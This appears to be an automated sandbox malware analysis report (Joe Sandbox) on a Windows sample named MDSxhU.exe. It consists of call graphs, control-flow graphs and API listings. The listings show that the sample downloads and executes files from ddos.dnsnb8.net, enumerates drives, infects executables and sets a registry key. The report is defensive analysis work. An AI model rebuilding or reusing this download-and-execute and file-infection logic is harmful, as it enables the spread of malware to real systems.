1083->1135 1084->1067 1085->1084 1087 ad13cf LookupPrivilegeValueA 1086->1087 1088 ad14da 1086->1088 1089 ad13e7 1087->1089 1091 ad13ef 1087->1091 1088->1052 1303 ad119f GetCurrentProcess OpenProcessToken 1089->1303 1091->1088 1308 ad120e GetModuleHandleA GetProcAddress 1091->1308 1096 ad1448 GetCurrentProcessId 1096->1088 1097 ad1457 1096->1097 1097->1088 1098 ad1319 3 API calls 1097->1098 1099 ad147f 1098->1099 1100 ad1319 3 API calls 1099->1100 1101 ad148e 1100->1101 1101->1088 1102 ad1319 3 API calls 1101->1102 1103 ad14b4 1102->1103 1104 ad1319 3 API calls 1103->1104 1105 ad14c3 1104->1105 1106 ad1319 3 API calls 1105->1106 1106->1088 1322 ad185b GetSystemTimeAsFileTime srand rand srand rand 1107->1322 1109 ad1592 wsprintfA wsprintfA lstrlen CreateFileA 1110 ad15fb WriteFile CloseHandle 1109->1110 1111 ad1633 1109->1111 1110->1111 1112 ad161d ShellExecuteA 1110->1112 1111->1063 1112->1111 1114 ad19a0 1113->1114 1130 ad1ac7 1113->1130 1115 ad19af CreateFileA 1114->1115 1116 ad1a28 GetFileSize 1115->1116 1117 ad19c4 Sleep 1115->1117 1119 ad1a38 1116->1119 1120 ad1a80 1116->1120 1117->1115 1118 ad19d5 1117->1118 1134 ad185b GetSystemTimeAsFileTime srand rand srand rand 1118->1134 1119->1120 1124 ad1a3d VirtualAlloc 1119->1124 1121 ad1a8d FindCloseChangeNotification 1120->1121 1122 ad1a96 1120->1122 1121->1122 1125 ad1aad 1122->1125 1126 ad1a9c DeleteFileA 1122->1126 1124->1120 1128 ad1a53 1124->1128 1125->1130 1133 ad1ab8 VirtualFree 1125->1133 1126->1125 1127 ad19da wsprintfA CopyFileA 1127->1116 1131 ad1a0d CreateFileA 1127->1131 1128->1120 1132 ad1a59 ReadFile 1128->1132 1130->1082 1130->1083 1131->1116 1131->1126 1132->1120 1132->1128 1133->1130 1134->1127 1136 ad2c09 WaitForMultipleObjects 1135->1136 1141 ad2bc8 1135->1141 1138 ad2c3c 1136->1138 1139 ad2c2a CreateThread 1136->1139 1137 ad2bfa lstrlen 1137->1136 1137->1141 1139->1138 1146 ad2845 1139->1146 1140 ad2bd2 GetDriveTypeA 1140->1137 1140->1141 1141->1137 1141->1140 1142 ad2be3 CreateThread 1141->1142 1142->1137 1143 ad2b7d 1142->1143 1156 ad29e2 memset wsprintfA 1143->1156 1293 ad274a memset memset SHGetSpecialFolderPathA wsprintfA 1146->1293 1148 ad2878 DeleteFileA 1149 ad288c VirtualFree 1148->1149 1150 ad289a 1148->1150 1149->1150 1152 ad28ab 1150->1152 1153 ad28a4 CloseHandle 1150->1153 1151 ad2692 8 API calls 1154 ad2853 1151->1154 1153->1152 1154->1148 1154->1151 1155 ad239d 186 API calls 1154->1155 1155->1154 1157 ad2abc memset memset FindFirstFileA 1156->1157 1158 ad2a3a memset lstrlen lstrcpyn strrchr 1156->1158 1170 ad28b8 memset wsprintfA 1157->1170 1158->1157 1159 ad2a88 1158->1159 1159->1157 1161 ad2a9a lstrcmpiA 1159->1161 1163 ad2aad lstrlen 1161->1163 1164 ad2b74 1161->1164 1163->1157 1163->1161 1165 ad2b61 FindNextFileA 1166 ad2b6d FindClose 1165->1166 1167 ad2b23 1165->1167 1166->1164 1168 ad28b8 174 API calls 1167->1168 1169 ad2b35 lstrcmpiA 1167->1169 1168->1165 1169->1166 1169->1167 1171 ad2905 1170->1171 1176 ad2951 memset 1170->1176 1172 ad291b memset wsprintfA 1171->1172 1173 ad2956 strrchr 1171->1173 1171->1176 1174 ad29e2 180 API calls 1172->1174 1175 ad2967 lstrcmpiA 1173->1175 1173->1176 1174->1176 1177 ad2988 lstrcmpiA 1175->1177 1178 ad297a 1175->1178 1176->1165 1177->1176 1180 ad2994 1177->1180 1188 ad1e6e 1178->1188 1181 ad29ad strstr 1180->1181 1182 ad29a5 lstrcpy 1180->1182 1183 ad29cb 1181->1183 1184 ad29d3 1181->1184 1182->1181 1231 ad239d strstr 1183->1231 1253 ad2692 1184->1253 1189 ad1e7d 1188->1189 1262 ad1df6 strrchr 1189->1262 1192 ad1eb0 SetFileAttributesA CreateFileA 1193 ad2332 1192->1193 1194 ad1edf 1192->1194 1196 ad233d UnmapViewOfFile 1193->1196 1197 ad2346 1193->1197 1267 ad1915 1194->1267 1196->1197 1199 ad234b FindCloseChangeNotification 1197->1199 1200 ad2350 1197->1200 1199->1200 1201 ad2356 CloseHandle 1200->1201 1202 ad2391 1200->1202 1201->1202 1202->1176 1203 ad1f2e 1203->1193 1273 ad1c81 1203->1273 1207 ad1f92 1208 ad1c81 2 API calls 1207->1208 1209 ad1f9f 1208->1209 1209->1193 1210 ad1af9 169 API calls 1209->1210 1211 ad2024 1209->1211 1215 ad1fc0 1210->1215 1211->1193 1212 ad1af9 169 API calls 1211->1212 1213 ad207a 1212->1213 1214 ad1af9 169 API calls 1213->1214 1219 ad2090 1214->1219 1215->1193 1215->1211 1216 ad1af9 169 API calls 1215->1216 1217 ad1ffe 1216->1217 1218 ad2013 FlushViewOfFile 1217->1218 1218->1211 1220 ad20bb memset memset 1219->1220 1221 ad20f5 1220->1221 1222 ad1c81 2 API calls 1221->1222 1223 ad21de 1222->1223 1224 ad2226 memcpy UnmapViewOfFile CloseHandle 1223->1224 1278 ad1b8a 1224->1278 1226 ad226e 1286 ad185b GetSystemTimeAsFileTime srand rand srand rand 1226->1286 1228 ad22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1229 ad1915 3 API calls 1228->1229 1230 ad231f CloseHandle 1229->1230 1230->1193 1232 ad2451 CreateFileA GetFileSize 1231->1232 1238 ad23d8 1231->1238 1233 ad2675 CloseHandle 1232->1233 1234 ad2480 1232->1234 1235 ad267c RemoveDirectoryA 1233->1235 1234->1233 1236 ad2499 1234->1236 1237 ad2687 1235->1237 1239 ad1915 3 API calls 1236->1239 1237->1176 1238->1232 1238->1237 1240 ad24a4 9 API calls 1239->1240 1288 ad189d memset CreateProcessA 1240->1288 1243 ad255c Sleep memset wsprintfA 1244 ad29e2 163 API calls 1243->1244 1245 ad2597 memset wsprintfA Sleep 1244->1245 1246 ad189d 6 API calls 1245->1246 1247 ad25e4 Sleep CreateFileA 1246->1247 1248 ad1915 3 API calls 1247->1248 1249 ad2610 CloseHandle 1248->1249 1249->1235 1250 ad261e 1249->1250 1250->1235 1251 ad2641 SetFilePointer WriteFile 1250->1251 1251->1235 1252 ad2667 SetEndOfFile 1251->1252 1252->1235 1254 ad26b2 WaitForSingleObject 1253->1254 1255 ad26a2 CreateEventA 1253->1255 1256 ad2708 1254->1256 1257 ad26c1 lstrlen ??2@YAPAXI 1254->1257 1255->1254 1259 ad2736 SetEvent 1256->1259 1260 ad2718 lstrcpy ??3@YAXPAX 1256->1260 1258 ad26da lstrcpy 1257->1258 1257->1259 1261 ad26f1 1258->1261 1259->1176 1260->1261 1261->1259 1263 ad1e13 lstrcpy strrchr 1262->1263 1264 ad1e62 1262->1264 1263->1264 1265 ad1e40 lstrcmpiA 1263->1265 1264->1192 1264->1193 1265->1264 1266 ad1e52 lstrlen 1265->1266 1266->1264 1266->1265 1268 ad1928 1267->1268 1271 ad1924 SetFilePointer CreateFileMappingA MapViewOfFile 1267->1271 1269 ad194f 1268->1269 1270 ad192e memset GetFileTime 1268->1270 1269->1271 1272 ad1954 SetFileTime 1269->1272 1270->1271 1271->1193 1271->1203 1272->1271 1274 ad1c9c 1273->1274 1276 ad1c94 1273->1276 1275 ad1cae memset memset 1274->1275 1274->1276 1275->1276 1276->1193 1277 ad185b GetSystemTimeAsFileTime srand rand srand rand 1276->1277 1277->1207 1279 ad1b93 1278->1279 1287 ad185b GetSystemTimeAsFileTime srand rand srand rand 1279->1287 1281 ad1bca srand 1282 ad1bd8 rand 1281->1282 1283 ad1c08 1282->1283 1283->1282 1284 ad1c29 memset memcpy lstrcat 1283->1284 1284->1226 1286->1228 1287->1281 1289 ad190c 1288->1289 1290 ad18e0 CloseHandle WaitForSingleObject 1288->1290 1289->1235 1289->1243 1291 ad18fb GetExitCodeProcess 1290->1291 1292 ad1907 CloseHandle 1290->1292 1291->1292 1292->1289 1302 ad185b GetSystemTimeAsFileTime srand rand srand rand 1293->1302 1295 ad27b5 wsprintfA CopyFileA 1296 ad27de wsprintfA 1295->1296 1297 ad2840 1295->1297 1298 ad1973 17 API calls 1296->1298 1297->1154 1299 ad280f 1298->1299 1300 ad2820 CreateFileA 1299->1300 1301 ad2813 DeleteFileA 1299->1301 1300->1297 1301->1300 1302->1295 1304 ad11c6 AdjustTokenPrivileges 1303->1304 1305 ad1200 CloseHandle 1303->1305 1306 ad11f7 CloseHandle 1304->1306 1307 ad11f6 1304->1307 1305->1091 1306->1305 1307->1306 1309 ad123f GetCurrentProcessId OpenProcess 1308->1309 1310 ad1310 1308->1310 1309->1310 1314 ad1262 1309->1314 1310->1088 1317 ad1319 1310->1317 1311 ad12b0 VirtualAlloc 1311->1314 1316 ad12b8 1311->1316 1312 ad12f1 CloseHandle 1312->1310 1313 ad1302 VirtualFree 1312->1313 1313->1310 1314->1311 1314->1312 1315 ad1296 VirtualFree 1314->1315 1314->1316 1315->1311 1316->1312 1318 ad134a 1317->1318 1319 ad132a GetModuleHandleA GetProcAddress 1317->1319 1320 ad1351 memset 1318->1320 1321 ad1363 1318->1321 1319->1318 1319->1321 1320->1321 1321->1088 1321->1096 1322->1109 1324 ad10ba 1323->1324 1325 ad1196 1323->1325 1324->1325 1341 ad185b GetSystemTimeAsFileTime srand rand srand rand 1324->1341 1327 ad1118 wsprintfA wsprintfA URLDownloadToFileA 1328 ad10dc 1327->1328 1329 ad1168 lstrlen Sleep 1327->1329 1332 ad1000 CreateFileA 1328->1332 1329->1324 1333 ad1025 GetFileSize CreateFileMappingA MapViewOfFile 1332->1333 1334 ad1092 WinExec lstrlen 1332->1334 1335 ad107b 1333->1335 1336 ad1057 1333->1336 1334->1324 1334->1325 1339 ad108d CloseHandle 1335->1339 1340 ad1087 CloseHandle 1335->1340 1337 ad1074 UnmapViewOfFile 1336->1337 1338 ad1061 1336->1338 1337->1335 1338->1337 1339->1334 1340->1339 1341->1327 1348 ad2361 1349 ad236b UnmapViewOfFile 1348->1349 1350 ad2374 1348->1350 1349->1350 1351 ad2379 CloseHandle 1350->1351 1352 ad2382 1350->1352 1351->1352 1353 ad2388 CloseHandle 1352->1353 1354 ad2391 1352->1354 1353->1354

                                                                                    Callgraph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    • Opacity -> Relevance
                                                                                    • Disassembly available
                                                                                    callgraph 0 Function_00AD67A4 1 Function_00AD65A6 2 Function_00AD28B8 20 Function_00AD239D 2->20 30 Function_00AD2692 2->30 32 Function_00AD1E6E 2->32 38 Function_00AD29E2 2->38 3 Function_00AD1638 16 Function_00AD1581 3->16 23 Function_00AD139F 3->23 24 Function_00AD1099 3->24 26 Function_00AD1718 3->26 47 Function_00AD2C48 3->47 54 Function_00AD17D0 3->54 4 Function_00AD6834 5 Function_00AD6734 13 Function_00AD6A84 5->13 18 Function_00AD6D00 5->18 19 Function_00AD6B02 5->19 6 Function_00AD69B0 7 Function_00AD2B8C 39 Function_00AD2B7D 7->39 50 Function_00AD2845 7->50 8 Function_00AD680F 9 Function_00AD120E 10 Function_00AD1D8A 11 Function_00AD1B8A 53 Function_00AD185B 11->53 12 Function_00AD600A 13->8 46 Function_00AD6CF2 13->46 14 Function_00AD6001 14->12 15 Function_00AD1C81 16->53 17 Function_00AD1000 17->54 18->6 37 Function_00AD6B63 18->37 18->46 19->37 21 Function_00AD189D 20->21 28 Function_00AD1915 20->28 20->38 22 Function_00AD119F 23->9 23->22 25 Function_00AD1319 23->25 24->17 24->53 44 Function_00AD2CF0 26->44 27 Function_00AD2D9B 29 Function_00AD6014 31 Function_00AD6012 32->10 32->11 32->15 32->27 32->28 33 Function_00AD1C68 32->33 36 Function_00AD2D60 32->36 40 Function_00AD1AF9 32->40 43 Function_00AD1DF6 32->43 32->53 34 Function_00AD14E1 34->3 34->40 35 Function_00AD2361 35->27 37->0 37->4 37->6 38->2 39->38 40->3 41 Function_00AD6CF8 42 Function_00AD6076 48 Function_00AD66C8 42->48 45 Function_00AD1973 45->53 46->41 47->7 47->45 48->13 48->18 48->19 49 Function_00AD274A 49->45 49->53 50->20 50->30 50->49 51 Function_00AD235D 52 Function_00AD6159 52->48

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                                                                    • String ID: %s*$C:\$Documents and Settings
                                                                                    • API String ID: 2826467728-110786608
                                                                                    • Opcode ID: 0410cfb2c823fb5d6c69ddd63cf6ac039f1ddb0ae1c2e5dbe7d99df79f801be0
                                                                                    • Instruction ID: c91d854ddb75a5807ee76c6adde27f96f6f228e33352753525b1ddb6e956b113
                                                                                    • Opcode Fuzzy Hash: 0410cfb2c823fb5d6c69ddd63cf6ac039f1ddb0ae1c2e5dbe7d99df79f801be0
                                                                                    • Instruction Fuzzy Hash: C64163B3405349AFDB20DBA0DC49EEB77ACEB94715F04482BF546C3211E634DA59CBA2

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 172 ad1099-ad10b4 173 ad1199-ad119c 172->173 174 ad10ba-ad10c7 172->174 175 ad10c8-ad10d4 174->175 176 ad10da 175->176 177 ad1184-ad1190 175->177 179 ad1113-ad1162 call ad185b wsprintfA * 2 URLDownloadToFileA 176->179 177->175 178 ad1196-ad1198 177->178 178->173 182 ad10dc-ad110d call ad1000 WinExec lstrlen 179->182 183 ad1168-ad1182 lstrlen Sleep 179->183 182->178 182->179 183->177 183->179
                                                                                    APIs
                                                                                      • Part of subcall function 00AD185B: GetSystemTimeAsFileTime.KERNEL32(00AD1F92,00000000,?,00000000,?,?,?,00AD1F92,?,00000000,00000002), ref: 00AD1867
                                                                                      • Part of subcall function 00AD185B: srand.MSVCRT ref: 00AD1878
                                                                                      • Part of subcall function 00AD185B: rand.MSVCRT ref: 00AD1880
                                                                                      • Part of subcall function 00AD185B: srand.MSVCRT ref: 00AD1890
                                                                                      • Part of subcall function 00AD185B: rand.MSVCRT ref: 00AD1894
                                                                                    • WinExec.KERNEL32(?,00000005), ref: 00AD10F1
                                                                                    • lstrlen.KERNEL32(00AD4748), ref: 00AD10FA
                                                                                    • wsprintfA.USER32 ref: 00AD112A
                                                                                    • wsprintfA.USER32 ref: 00AD1143
                                                                                    • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00AD115B
                                                                                    • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00AD1169
                                                                                    • Sleep.KERNEL32 ref: 00AD1179
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                                                                    • String ID: %s%.8X.exe$C:\Users\user~1\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                    • API String ID: 1280626985-4120842960
                                                                                    • Opcode ID: 1bd7cefa1c6852afdf861dc46cf3e56e116670371c485c7203d09cc2b1e5a2d5
                                                                                    • Instruction ID: 36311d075b82c2c62bef2874891a38cd217ebfa4510d2e7431f7d5f70bc7e2cc
                                                                                    • Opcode Fuzzy Hash: 1bd7cefa1c6852afdf861dc46cf3e56e116670371c485c7203d09cc2b1e5a2d5
                                                                                    • Instruction Fuzzy Hash: 93218176901208BBDF20DBA0DC45BEEBBBCAB09315F11419BF507A2250D7749B85CFA1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 216 ad1718-ad1733 GetSystemTimeAsFileTime 217 ad1735-ad1752 SHSetValueA 216->217 218 ad1754-ad1758 216->218 219 ad17c6-ad17cd 217->219 218->219 220 ad175a-ad1784 SHGetValueA 218->220 220->219 221 ad1786-ad17b3 call ad2cf0 * 2 220->221 221->219 226 ad17b5 221->226 227 ad17bf 226->227 228 ad17b7-ad17bd 226->228 227->219 228->219 228->227
                                                                                    APIs
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe), ref: 00AD1729
                                                                                    • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00AD174C
                                                                                    • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00AD177C
                                                                                    • __aulldiv.LIBCMT ref: 00AD1796
                                                                                    • __aulldiv.LIBCMT ref: 00AD17A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: TimeValue__aulldiv$FileSystem
                                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe$SOFTWARE\GTplus$Time
                                                                                    • API String ID: 541852442-1717962303
                                                                                    • Opcode ID: 654a0fae40e55f56bcd58fceb218d35756cfcab9754afa3475d9abb2ff43aa80
                                                                                    • Instruction ID: 7668002bb933ad305b91ed7b0b122d6bddb2fbb8b0212a24089f977e977160c6
                                                                                    • Opcode Fuzzy Hash: 654a0fae40e55f56bcd58fceb218d35756cfcab9754afa3475d9abb2ff43aa80
                                                                                    • Instruction Fuzzy Hash: C4116376A00209BBDF109B94CD89FEF7BBDFB44B14F108526F902A6250D6719A45CB61

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 229 ad6076-ad6079 230 ad607b-ad6080 229->230 231 ad60e0-ad60eb 229->231 233 ad60f7-ad60f8 230->233 234 ad6082-ad6085 230->234 232 ad60ee-ad60f4 231->232 236 ad60f6 232->236 237 ad60fe-ad6106 233->237 238 ad60fa-ad60fc call ad66c8 233->238 235 ad6087 234->235 234->236 235->232 239 ad6089-ad6095 235->239 236->233 241 ad6108-ad611d 237->241 242 ad6155-ad6189 VirtualFree 237->242 238->237 243 ad6097-ad609f 239->243 244 ad60a1-ad60aa 239->244 246 ad611f-ad6121 241->246 251 ad618c-ad6192 242->251 243->244 249 ad61ba-ad61c8 244->249 250 ad60b0-ad60c1 VirtualAlloc 244->250 247 ad6151-ad6154 246->247 248 ad6123 246->248 247->242 248->247 252 ad6125-ad6128 248->252 255 ad61ca-ad61d7 249->255 256 ad6243-ad6251 249->256 253 ad60c7-ad60cf 250->253 251->253 254 ad6198-ad61b0 VirtualFree 251->254 258 ad612a-ad612e 252->258 259 ad6134-ad613b 252->259 253->251 260 ad60d5-ad60df VirtualAlloc 253->260 254->249 263 ad61b2-ad61b4 254->263 257 ad61dd-ad61e0 255->257 261 ad6264-ad626f 256->261 262 ad6253 256->262 257->256 265 ad61e2-ad61f2 257->265 258->259 272 ad6130-ad6132 258->272 259->272 273 ad613d-ad614f 259->273 260->231 264 ad6271-ad6276 261->264 268 ad6255-ad6258 262->268 263->249 269 ad627c-ad6289 264->269 270 ad6389-ad63b1 VirtualProtect 264->270 271 ad61f5-ad61fe 265->271 268->261 274 ad625a-ad6262 268->274 285 ad628b 269->285 286 ad6292-ad6298 269->286 277 ad63b7-ad63ba 270->277 275 ad620c-ad6219 271->275 276 ad6200-ad6203 271->276 272->246 273->246 274->268 281 ad6238-ad623f 275->281 279 ad621b-ad6228 276->279 280 ad6205-ad6208 276->280 282 ad63fc-ad63ff VirtualProtect 277->282 283 ad63bc-ad63c2 277->283 279->281 287 ad622a-ad6236 280->287 288 ad620a 280->288 281->271 290 ad6241 281->290 284 ad6400-ad6416 282->284 283->283 289 ad63c4 283->289 293 ad6418-ad641d 284->293 294 ad6420-ad6425 284->294 285->286 291 ad62a2-ad62ac 286->291 287->281 288->281 289->282 292 ad63c6-ad63cf 289->292 290->257 295 ad62ae 291->295 296 ad62b1-ad62c8 291->296 297 ad63d4-ad63d8 292->297 298 ad63d1 292->298 295->296 299 ad62ce-ad62d4 296->299 300 ad6373-ad6384 296->300 301 ad63dd-ad63e1 297->301 302 ad63da 297->302 298->297 303 ad62da-ad62f1 299->303 304 ad62d6-ad62d9 299->304 300->264 305 ad63e7-ad63fa VirtualProtect 301->305 306 ad63e3 301->306 302->301 308 ad6365-ad636e 303->308 309 ad62f3-ad62f9 303->309 304->303 305->277 305->282 306->305 308->291 310 ad62fb-ad630f 309->310 311 ad6314-ad6326 309->311 312 ad6426-ad64a9 310->312 313 ad634c-ad6360 311->313 314 ad6328-ad634a 311->314 323 ad6519-ad651c 312->323 324 ad64ab-ad64c0 312->324 313->312 314->308 325 ad651d-ad651e 323->325 326 ad6583-ad6587 323->326 330 ad6535-ad6537 324->330 331 ad64c2 324->331 329 ad6522-ad6533 325->329 328 ad6588-ad658b 326->328 332 ad658d-ad658f 328->332 333 ad65a1-ad65a3 328->333 329->330 334 ad6539 330->334 335 ad659a 330->335 336 ad64f8 331->336 337 ad64c5-ad64cd 331->337 338 ad6591-ad6593 332->338 339 ad653b-ad6541 334->339 340 ad65b4 334->340 341 ad659b-ad659d 335->341 344 ad656c-ad656f 336->344 345 ad64fa-ad64fe 336->345 342 ad64cf-ad64d4 337->342 343 ad6542-ad6545 337->343 338->341 346 ad6595 338->346 339->343 351 ad65be-ad6608 340->351 341->338 347 ad659f 341->347 348 ad6517-ad6518 342->348 349 ad64d6-ad64d9 342->349 350 ad654d-ad6550 343->350 352 ad6572 344->352 345->352 353 ad6500 345->353 346->335 347->328 348->323 349->350 355 ad64db-ad64f5 349->355 350->351 356 ad6552-ad6556 350->356 357 ad6573-ad6576 352->357 353->329 358 ad6502 353->358 355->336 359 ad6578-ad657f 356->359 360 ad6558-ad6569 356->360 357->359 358->357 361 ad6504-ad6513 358->361 359->326 360->344 361->330 363 ad6515 361->363 363->348
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00AD60BE
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00AD60DF
                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00AD6189
                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00AD61A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFree
                                                                                    • String ID:
                                                                                    • API String ID: 2087232378-0
                                                                                    • Opcode ID: 61db627d452e491b13022c11361fb5ed906d3293d0f6b2f2a21dca1eccfa391a
                                                                                    • Instruction ID: bf417ba2d08564869e1a59e30eb467891cca42fd9970fc7b5ab5ae1196c49b0f
                                                                                    • Opcode Fuzzy Hash: 61db627d452e491b13022c11361fb5ed906d3293d0f6b2f2a21dca1eccfa391a
                                                                                    • Instruction Fuzzy Hash: FA1223B25087858FDB328F64CC55BEA7BB0EF16310F1845AFE88A8B293D774A901C755

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 365 ad2b8c-ad2bc6 memset GetLogicalDriveStringsA 366 ad2c09-ad2c28 WaitForMultipleObjects 365->366 367 ad2bc8-ad2bcc 365->367 370 ad2c3c-ad2c45 366->370 371 ad2c2a-ad2c3a CreateThread 366->371 368 ad2bce-ad2bd0 367->368 369 ad2bfa-ad2c07 lstrlen 367->369 368->369 372 ad2bd2-ad2bdc GetDriveTypeA 368->372 369->366 369->367 371->370 372->369 373 ad2bde-ad2be1 372->373 373->369 374 ad2be3-ad2bf6 CreateThread 373->374 374->369
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 00AD2BA6
                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00AD2BB4
                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 00AD2BD3
                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00AD2BEE
                                                                                    • lstrlen.KERNEL32(?), ref: 00AD2BFB
                                                                                    • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00AD2C16
                                                                                    • CreateThread.KERNEL32(00000000,00000000,00AD2845,00000000,00000000,00000000), ref: 00AD2C3A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                                                                    • String ID:
                                                                                    • API String ID: 1073171358-0
                                                                                    • Opcode ID: cba3ec8e0018288c8732dd70950e0b76a30dafe31ec36b4b997cb71c72ce6a9b
                                                                                    • Instruction ID: a01d3c2db9d1afd4b4dd09d056cdd69b9b0da9c1e67b5d40b8058e2b2014ca4e
                                                                                    • Opcode Fuzzy Hash: cba3ec8e0018288c8732dd70950e0b76a30dafe31ec36b4b997cb71c72ce6a9b
                                                                                    • Instruction Fuzzy Hash: D321AEB280014CBFEB20DFA4AC84EAE7B6DFB54344B14052BF84392251D7718E06CB61

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
